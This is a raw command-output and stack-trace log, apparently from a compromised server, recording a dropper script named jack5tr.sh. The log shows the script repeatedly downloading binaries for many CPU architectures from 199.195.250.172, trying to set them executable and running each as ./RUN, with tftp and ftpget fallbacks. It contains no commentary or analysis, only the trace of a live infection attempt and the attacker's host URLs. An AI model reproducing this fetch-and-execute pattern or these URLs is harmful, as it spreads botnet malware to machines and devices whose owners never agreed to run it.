100 58916 100 58916 0 0 27579 0 0:00:02 0:00:02 --:--:-- 27582
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 11: ./RUN: cannot execute binary file
--2023-03-21 09:50:13-- http://199.195.250.172/spc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63096 (62K)
Saving to: ‘spc.1’
0K .......... .......... .......... .......... .......... 81% 14.5K 1s
50K .......... . 100% 67.1M=3.4s
2023-03-21 09:50:16 (17.9 KB/s) - ‘spc.1’ saved [63096/63096]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
46 63096 46 29490 0 0 20733 0 0:00:03 0:00:01 0:00:02 20723
98 63096 98 62258 0 0 29114 0 0:00:02 0:00:02 --:--:-- 29106
100 63096 100 63096 0 0 21737 0 0:00:02 0:00:02 --:--:-- 21734
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 12: ./RUN: cannot execute binary file
--2023-03-21 09:50:19-- http://199.195.250.172/m68k
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65384 (64K)
Saving to: ‘m68k.1’
0K .......... .......... .......... .......... .......... 78% 46.2K 0s
50K .......... ... 100% 64.4K=1.3s
2023-03-21 09:50:21 (49.2 KB/s) - ‘m68k.1’ saved [65384/65384]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
10 65384 10 6962 0 0 15456 0 0:00:04 --:--:-- 0:00:04 15436
71 65384 71 46898 0 0 24808 0 0:00:02 0:00:01 0:00:01 24800
100 65384 100 65384 0 0 25532 0 0:00:02 0:00:02 --:--:-- 25530
100 65384 100 65384 0 0 25530 0 0:00:02 0:00:02 --:--:-- 25530
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 13: ./RUN: cannot execute binary file
--2023-03-21 09:50:24-- http://199.195.250.172/sh4
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54644 (53K)
Saving to: ‘sh4.1’
0K .......... .......... .......... .......... .......... 93% 25.7K 0s
50K ... 100% 4.81K=2.6s
2023-03-21 09:50:27 (20.2 KB/s) - ‘sh4.1’ saved [54644/54644]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
31 54644 31 17202 0 0 25087 0 0:00:02 --:--:-- 0:00:02 25075
89 54644 89 48946 0 0 26410 0 0:00:02 0:00:01 0:00:01 26400
100 54644 100 54644 0 0 26359 0 0:00:02 0:00:02 --:--:-- 26372
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 14: ./RUN: cannot execute binary file
/bin/bash: tftp: command not found
chmod: cannot access ‘jack5tr2.sh’: No such file or directory
sh: jack5tr2.sh: No such file or directory
/bin/bash: ftpget: command not found
sh: jack5tr1.sh: No such file or directory
rm: cannot remove ‘agent.sock’: Operation not permitted
rm: cannot remove ‘ansible_ping_payload_tHqv_K’: Operation not permitted
rm: cannot remove ‘ss.txt’: Operation not permitted
rm: cannot remove ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
Stack trace: ExitCodeException exitCode=1: --2023-03-21 09:47:55-- http://199.195.250.172/jack5tr.sh
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2089 (2.0K) [application/x-sh]
Saving to: ‘jack5tr.sh’
0K .. 100% 2.70K=0.8s
2023-03-21 09:47:56 (2.70 KB/s) - ‘jack5tr.sh’ saved [2089/2089]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 2089 100 2089 0 0 4621 0 --:--:-- --:--:-- --:--:-- 4621
--2023-03-21 09:47:57-- http://199.195.250.172/x86
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 51504 (50K)
Saving to: ‘x86’
0K .......... .......... .......... .......... .......... 99% 37.3K 0s
50K 100% 566G=1.3s
2023-03-21 09:47:59 (37.5 KB/s) - ‘x86’ saved [51504/51504]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
37 51504 37 19250 0 0 20056 0 0:00:02 --:--:-- 0:00:02 20052
100 51504 100 51504 0 0 27391 0 0:00:01 0:00:01 --:--:-- 27381
100 51504 100 51504 0 0 27388 0 0:00:01 0:00:01 --:--:-- 27381
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mv: cannot stat ‘\025\005\b./RUN’: No such file or directory
chmod: cannot access ‘\004\b\001bin/watchdog’: No such file or directory
--2023-03-21 09:48:01-- http://199.195.250.172/mips
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 77236 (75K)
Saving to: ‘mips’
0K .......... .......... .......... .......... .......... 66% 28.4K 1s
50K .......... .......... ..... 100% 22.5K=2.9s
2023-03-21 09:48:04 (26.1 KB/s) - ‘mips’ saved [77236/77236]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
14 77236 14 11057 0 0 16028 0 0:00:04 --:--:-- 0:00:04 16024
60 77236 60 46897 0 0 29300 0 0:00:02 0:00:01 0:00:01 29292
100 77236 100 77236 0 0 31062 0 0:00:02 0:00:02 --:--:-- 31068
jack5tr.sh: line 3: RUN: Text file busy
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mkdir: cannot create directory ‘bin’: File exists
chmod: cannot access ‘\005\b\356\364\004\b\001bin/busybox’: No such file or directory
--2023-03-21 09:48:07-- http://199.195.250.172/arc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-21 09:48:07 ERROR 404: Not Found.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 201 100 201 0 0 435 0 --:--:-- --:--:-- --:--:-- 436
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
./RUN: line 1: syntax error near unexpected token `newline'
./RUN: line 1: `<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'
--2023-03-21 09:48:07-- http://199.195.250.172/x86_64
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 59200 (58K)
Saving to: ‘x86_64’
0K .......... .......... .......... .......... .......... 86% 38.6K 0s
50K ....... 100% 38.4K=1.5s
2023-03-21 09:48:09 (38.6 KB/s) - ‘x86_64’ saved [59200/59200]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
48 59200 48 28466 0 0 26073 0 0:00:02 0:00:01 0:00:01 26067
75 59200 75 44850 0 0 16385 0 0:00:03 0:00:02 0:00:01 16380
75 59200 75 44850 0 0 11996 0 0:00:04 0:00:03 0:00:01 11995
100 59200 100 59200 0 0 15008 0 0:00:03 0:00:03 --:--:-- 15006
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mkdir: cannot create directory ‘bin’: File exists
sh: ��bin/busybox: No such file or directory
chmod: cannot access ‘bin/busybox’: No such file or directory
--2023-03-21 09:48:13-- http://199.195.250.172/mpsl
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80644 (79K)
Saving to: ‘mpsl’
0K .......... .......... .......... .......... .......... 63% 37.3K 1s
50K .......... .......... ........ 100% 17.8K=3.0s
2023-03-21 09:48:17 (26.7 KB/s) - ‘mpsl’ saved [80644/80644]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
39 80644 39 31537 0 0 28795 0 0:00:02 0:00:01 0:00:01 28827
58 80644 58 46897 0 0 27674 0 0:00:02 0:00:01 0:00:01 27667
74 80644 74 60209 0 0 22441 0 0:00:03 0:00:02 0:00:01 22440
92 80644 92 74545 0 0 19687 0 0:00:04 0:00:03 0:00:01 19684
100 80644 100 80644 0 0 19090 0 0:00:04 0:00:04 --:--:-- 19091
jack5tr.sh: line 6: RUN: Text file busy
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
--2023-03-21 09:48:21-- http://199.195.250.172/arm
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 62780 (61K)
Saving to: ‘arm’
0K .......... .......... .......... .......... .......... 81% 41.7K 0s
50K .......... . 100% 7.35K=2.7s
2023-03-21 09:48:24 (22.4 KB/s) - ‘arm’ saved [62780/62780]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
43 62780 43 27442 0 0 19981 0 0:00:03 0:00:01 0:00:02 19972
96 62780 96 60210 0 0 23403 0 0:00:02 0:00:02 --:--:-- 23400
100 62780 100 62780 0 0 22877 0 0:00:02 0:00:02 --:--:-- 22879
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 7: ./RUN: cannot execute binary file
--2023-03-21 09:48:27-- http://199.195.250.172/arm5
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36432 (36K)
Saving to: ‘arm5’
0K .......... .......... .......... ..... 100% 24.0K=1.5s
2023-03-21 09:48:29 (24.0 KB/s) - ‘arm5’ saved [36432/36432]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
2 36432 2 818 0 0 1551 0 0:00:23 --:--:-- 0:00:23 1552
83 36432 83 30514 0 0 16098 0 0:00:02 0:00:01 0:00:01 16093
97 36432 97 35634 0 0 12944 0 0:00:02 0:00:02 --:--:-- 12943
100 36432 100 36432 0 0 12261 0 0:00:02 0:00:02 --:--:-- 12258
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 8: ./RUN: cannot execute binary file
--2023-03-21 09:48:32-- http://199.195.250.172/arm6
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75064 (73K)
Saving to: ‘arm6’
0K .......... .......... .......... .......... .......... 68% 37.7K 1s
50K .......... .......... ... 100% 51.2K=1.8s
2023-03-21 09:48:34 (41.1 KB/s) - ‘arm6’ saved [75064/75064]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
46 75064 46 34609 0 0 17544 0 0:00:04 0:00:01 0:00:03 17541
73 75064 73 55089 0 0 25092 0 0:00:02 0:00:02 --:--:-- 25086
100 75064 100 75064 0 0 23957 0 0:00:03 0:00:03 --:--:-- 23959
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 9: ./RUN: cannot execute binary file
--2023-03-21 09:48:37-- http://199.195.250.172/arm7
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 146122 (143K)
Saving to: ‘arm7’
0K .......... .......... .......... .......... .......... 35% 25.3K 4s
50K .......... .......... .......... .......... .......... 70% 16.6K 2s
100K .......... .......... .......... .......... .. 100% 13.9K=8.1s
2023-03-21 09:48:46 (17.7 KB/s) - ‘arm7’ saved [146122/146122]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
11 142k 11 16176 0 0 21242 0 0:00:06 --:--:-- 0:00:06 21228
29 142k 29 42800 0 0 24278 0 0:00:06 0:00:01 0:00:05 24276
48 142k 48 71472 0 0 26408 0 0:00:05 0:00:02 0:00:03 26402
59 142k 59 86832 0 0 24652 0 0:00:05 0:00:03 0:00:02 24654
79 142k 79 112k 0 0 25022 0 0:00:05 0:00:04 0:00:01 25022
92 142k 92 131k 0 0 24350 0 0:00:06 0:00:05 0:00:01 24845
100 142k 100 142k 0 0 24323 0 0:00:06 0:00:06 --:--:-- 24345
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 10: ./RUN: cannot execute binary file
--2023-03-21 09:48:52-- http://199.195.250.172/ppc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 58916 (58K)
Saving to: ‘ppc’
0K .......... .......... .......... .......... .......... 86% 31.4K 0s
50K ....... 100% 35.5K=1.8s
2023-03-21 09:48:54 (31.9 KB/s) - ‘ppc’ saved [58916/58916]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0
83 58916 83 48946 0 0 21051 0 0:00:02 0:00:02 --:--:-- 21052
100 58916 100 58916 0 0 21287 0 0:00:02 0:00:02 --:--:-- 21284
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 11: ./RUN: cannot execute binary file
--2023-03-21 09:48:57-- http://199.195.250.172/spc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 63096 (62K)
Saving to: ‘spc’
0K .......... .......... .......... .......... .......... 81% 27.7K 0s
50K .......... . 100% 52.4K=2.0s
2023-03-21 09:49:00 (30.4 KB/s) - ‘spc’ saved [63096/63096]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
45 63096 45 28466 0 0 31962 0 0:00:01 --:--:-- 0:00:01 31948
59 63096 59 37682 0 0 17837 0 0:00:03 0:00:02 0:00:01 17841
100 63096 100 63096 0 0 27273 0 0:00:02 0:00:02 --:--:-- 27278
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 12: ./RUN: cannot execute binary file
--2023-03-21 09:49:02-- http://199.195.250.172/m68k
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 65384 (64K)
Saving to: ‘m68k’
0K .......... .......... .......... .......... .......... 78% 31.5K 0s
50K .......... ... 100% 20.5K=2.3s
2023-03-21 09:49:05 (28.2 KB/s) - ‘m68k’ saved [65384/65384]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
34 65384 34 22322 0 0 23309 0 0:00:02 --:--:-- 0:00:02 23300
65 65384 65 42802 0 0 23377 0 0:00:02 0:00:01 0:00:01 23376
100 65384 100 65384 0 0 24160 0 0:00:02 0:00:02 --:--:-- 24171
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 13: ./RUN: cannot execute binary file
--2023-03-21 09:49:07-- http://199.195.250.172/sh4
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 54644 (53K)
Saving to: ‘sh4’
0K .......... .......... .......... .......... .......... 93% 15.3K 0s
50K ... 100% 15.4K=3.5s
2023-03-21 09:49:11 (15.3 KB/s) - ‘sh4’ saved [54644/54644]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
70 54644 70 38706 0 0 27377 0 0:00:01 0:00:01 --:--:-- 27373
100 54644 100 54644 0 0 26424 0 0:00:02 0:00:02 --:--:-- 26436
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 14: ./RUN: cannot execute binary file
/bin/bash: tftp: command not found
--2023-03-21 09:49:13-- http://199.195.250.172/x86
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 51504 (50K)
Saving to: ‘x86.1’
0K .......... .......... .......... .......... .......... 99% 17.1K 0s
50K 100% 566G=2.9s
2023-03-21 09:49:17 (17.2 KB/s) - ‘x86.1’ saved [51504/51504]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
13 51504 13 6962 0 0 16047 0 0:00:03 --:--:-- 0:00:03 16041
75 51504 75 38706 0 0 27191 0 0:00:01 0:00:01 --:--:-- 27181
100 51504 100 51504 0 0 24239 0 0:00:02 0:00:02 --:--:-- 24248
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mkdir: cannot create directory ‘bin’: File exists
chmod: cannot access ‘\005\b\356\364\004\b\001bin/systemd’: No such file or directory
--2023-03-21 09:49:19-- http://199.195.250.172/mips
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 77236 (75K)
Saving to: ‘mips.1’
0K .......... .......... .......... .......... .......... 66% 21.7K 1s
50K .......... .......... ..... 100% 23.0K=3.4s
2023-03-21 09:49:23 (22.1 KB/s) - ‘mips.1’ saved [77236/77236]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
9 77236 9 6961 0 0 15952 0 0:00:04 --:--:-- 0:00:04 15929
56 77236 56 43825 0 0 32742 0 0:00:02 0:00:01 0:00:01 32729
100 77236 100 77236 0 0 34647 0 0:00:02 0:00:02 --:--:-- 34650
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 3: ./RUN: cannot execute binary file
--2023-03-21 09:49:25-- http://199.195.250.172/arc
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2023-03-21 09:49:26 ERROR 404: Not Found.
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
100 201 100 201 0 0 414 0 --:--:-- --:--:-- --:--:-- 415
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
./RUN: line 1: syntax error near unexpected token `newline'
./RUN: line 1: `<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'
--2023-03-21 09:49:26-- http://199.195.250.172/x86_64
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 59200 (58K)
Saving to: ‘x86_64.1’
0K .......... .......... .......... .......... .......... 86% 43.6K 0s
50K ....... 100% 32.8K=1.4s
2023-03-21 09:49:28 (41.8 KB/s) - ‘x86_64.1’ saved [59200/59200]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
11 59200 11 6962 0 0 14859 0 0:00:03 --:--:-- 0:00:03 14844
29 59200 29 17202 0 0 8784 0 0:00:06 0:00:01 0:00:05 8781
75 59200 75 44850 0 0 16392 0 0:00:03 0:00:02 0:00:01 16392
100 59200 100 59200 0 0 14611 0 0:00:04 0:00:04 --:--:-- 14613
100 59200 100 59200 0 0 14610 0 0:00:04 0:00:04 --:--:-- 14613
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
mkdir: cannot create directory ‘bin’: File exists
sh: ���bin/busybox: No such file or directory
chmod: cannot access ‘bin/busybox’: No such file or directory
--2023-03-21 09:49:32-- http://199.195.250.172/mpsl
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 80644 (79K)
Saving to: ‘mpsl.1’
0K .......... .......... .......... .......... .......... 63% 23.4K 1s
50K .......... .......... ........ 100% 17.1K=3.8s
2023-03-21 09:49:38 (20.6 KB/s) - ‘mpsl.1’ saved [80644/80644]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
25 80644 25 20273 0 0 21982 0 0:00:03 --:--:-- 0:00:03 21964
59 80644 59 47921 0 0 23790 0 0:00:03 0:00:02 0:00:01 23793
89 80644 89 72497 0 0 24951 0 0:00:03 0:00:02 0:00:01 24947
100 80644 100 80644 0 0 22615 0 0:00:03 0:00:03 --:--:-- 22621
jack5tr.sh: line 6: RUN: Text file busy
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
--2023-03-21 09:49:41-- http://199.195.250.172/arm
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 62780 (61K)
Saving to: ‘arm.1’
0K .......... .......... .......... .......... .......... 81% 37.7K 0s
50K .......... . 100% 25.5K=1.8s
2023-03-21 09:49:44 (34.6 KB/s) - ‘arm.1’ saved [62780/62780]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
30 62780 30 19250 0 0 21502 0 0:00:02 --:--:-- 0:00:02 21484
81 62780 81 50994 0 0 25554 0 0:00:02 0:00:01 0:00:01 25548
100 62780 100 62780 0 0 25524 0 0:00:02 0:00:02 --:--:-- 25530
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 7: ./RUN: cannot execute binary file
--2023-03-21 09:49:46-- http://199.195.250.172/arm5
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 36432 (36K)
Saving to: ‘arm5.1’
0K .......... .......... .......... ..... 100% 32.9K=1.1s
2023-03-21 09:49:48 (32.9 KB/s) - ‘arm5.1’ saved [36432/36432]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
38 36432 38 14130 0 0 15278 0 0:00:02 --:--:-- 0:00:02 15275
100 36432 100 36432 0 0 18074 0 0:00:02 0:00:02 --:--:-- 18080
100 36432 100 36432 0 0 18072 0 0:00:02 0:00:02 --:--:-- 18080
chmod: changing permissions of ‘agent.sock’: Operation not permitted
chmod: changing permissions of ‘ansible_ping_payload_tHqv_K’: Operation not permitted
chmod: changing permissions of ‘ss.txt’: Operation not permitted
chmod: changing permissions of ‘systemd-private-beeaf0028ab84544b3dd246d21ad9540-chronyd.service-e8aPai’: Operation not permitted
jack5tr.sh: line 8: ./RUN: cannot execute binary file
--2023-03-21 09:49:50-- http://199.195.250.172/arm6
Connecting to 199.195.250.172:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 75064 (73K)
Saving to: ‘arm6.1’
0K .......... .......... .......... .......... .......... 68% 27.8K 1s
50K .......... .......... ... 100% 14.1K=3.4s
2023-03-21 09:49:54 (21.3 KB/s) - ‘arm6.1’ saved [75064/75064]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0
21 75064 21 16177 0 0 17580 0 0:00:04 --:--:-- 0:00:04 17564
65 75064 65 48945 0 0 24056 0 0:00:03 0:00:02 0:00:01 24063
